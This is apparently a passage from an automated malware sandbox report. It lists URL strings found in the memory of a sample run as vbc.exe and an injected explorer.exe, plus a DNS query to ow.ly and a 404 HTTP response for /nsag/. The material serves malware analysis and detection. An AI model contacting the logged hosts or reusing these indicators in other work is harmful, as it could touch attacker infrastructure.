          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: unknownDNS traffic detected: queries for: ow.ly
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 23 Feb 2021 09:27:26 GMTServer: ApacheX-XSS-Protection: 1; mode=blockX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 6e 73 61 67 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /nsag/ was not found on this server.</p></body></html>
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.2182158267.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: vbc.exe, vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: vbc.exe, 00000004.00000002.2165581608.000000000040A000.00000004.00020000.sdmp, vbc.exe, 00000005.00000000.2160641622.000000000040A000.00000008.00020000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000006.00000000.2184570235.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: vbc.exe, 00000004.00000002.2167128733.0000000002990000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2183945867.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.2195829313.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: vbc.exe, 00000004.00000002.2166184951.0000000001FE0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2169244442.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000006.00000000.2196232044.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
